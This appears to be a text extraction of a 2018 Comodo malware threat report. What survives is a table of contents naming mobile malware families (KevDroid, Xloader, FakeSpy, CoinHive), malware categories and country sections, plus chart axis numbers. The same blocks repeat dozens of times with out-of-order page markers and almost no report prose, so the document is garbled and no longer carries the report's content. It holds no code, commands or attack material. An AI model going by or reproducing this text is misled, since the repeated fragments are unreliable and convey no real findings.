421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 31 of 73



Delete SMS

Set ringer mode


Clear memory








Make records

Make calls


App Distribution

FlexiSpy MBackup



of 73

Mobile Spy











Page 33 of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 32 of 73

Mobile Spy











of 73























Page 34 of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 33 of 73























of 73







plmbank

aibibankandroid



Version 1




Page 35 of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 34 of 73







plmbank

aibibankandroid



Version 1




of 73







Version 1







Page 36 of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 35 of 73







Version 1







of 73












Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 36 of 73












of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 37 of 73


421 April 2018


422 May 2018


020000400006000080000

100000120000140000160000180000

050000

100000150000200000250000300000350000400000450000500000


of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


Page 39 of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 38 of 73

423 June 2018


0

50000

100000

150000

200000

250000

300000


of 73




Page 40 of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 39 of 73




of 73



Page 41 of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 40 of 73



of 73






Page 42 of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 41 of 73






of 73






Page 43 of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 42 of 73






of 73






Page 44 of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 43 of 73






of 73






Page 45 of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 44 of 73






of 73






Page 46 of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 45 of 73






of 73




Page 47 of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 46 of 73




of 73






Page 48 of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 47 of 73






of 73






Page 49 of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 48 of 73






of 73






Page 50 of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 49 of 73






of 73






Page 51 of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

76 Belarus



Page 69 of 73

77 Iraq



Page 70 of 73

78 Ukraine



Page 71 of 73

79 Croatia



Page 72 of 73




Page 73 of 73







NORTH AMERICA―

EUROPE―

ASIA―





VISIT COMODOCOM














Brought to you by

1 Executive summary

11 Overview

12 New Trends




















411 KevDroid

412 Zoo Park

413 MikeSpy

414 Xloader

415 Stalker Spy

416 Mystery Bot

417 FakeSpy

418 RedAlert

419 Hero Rat

4110 Sonvpay

4111 CoinHive


421 April 2018

422 May 2018

423 June 2018



511 Generic Worms

512 Net Worms

513 Email Worms

514 p2p Worms

515 IM Worms


521 Backdoors

522 Viruses

523 Trojans

524 Exploits


531 Constructor

532 Packers

533 Email Flooder

534 Virtual Tools

535 Jokes


541 Applications



6 Vertical analysis


71 USA

72 China

73 South Korea

74 North Korea

75 Armenia

76 Belarus

77 Iraq

78 Ukraine

79 Croatia


8 Conclusions


Page 50 of 73






of 73



Page 52 of 73






Page 53 of 73






Page 54 of 73






Page 55 of 73






Page 56 of 73






Page 57 of 73



Page 58 of 73






Page 59 of 73






Page 60 of 73






Page 61 of 73




Page 62 of 73






Page 63 of 73




Page 64 of 73



Page 65 of 73

73 South Korea



Page 66 of 73

74 North Korea



Page 67 of 73

75 Armenia



Page 68 of 73

